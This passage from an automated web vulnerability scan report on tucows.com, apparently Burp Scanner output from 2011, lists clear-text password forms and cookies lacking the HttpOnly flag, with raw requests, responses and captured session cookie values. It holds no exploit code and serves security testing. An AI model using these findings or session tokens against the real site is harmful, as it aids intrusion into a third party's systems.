Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.62. http://www.tucows.com/terms.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

3. Cookie without HttpOnly flag set
There are 32 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

3.1. http://www.tucows.com/preview/194850/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...

3.2. http://www.tucows.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...

3.3. http://www.tucows.com/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

3.4. http://www.tucows.com/advertise.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

3.5. http://www.tucows.com/affiliate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

3.6. http://www.tucows.com/author_ratings.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

3.7. http://www.tucows.com/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...

3.8. http://www.tucows.com/images/newassets/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.9. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.10. http://www.tucows.com/images/newassets/includes/js/aalib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.11. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.12. http://www.tucows.com/images/newassets/includes/js/show_layer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (it is the cookie named in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

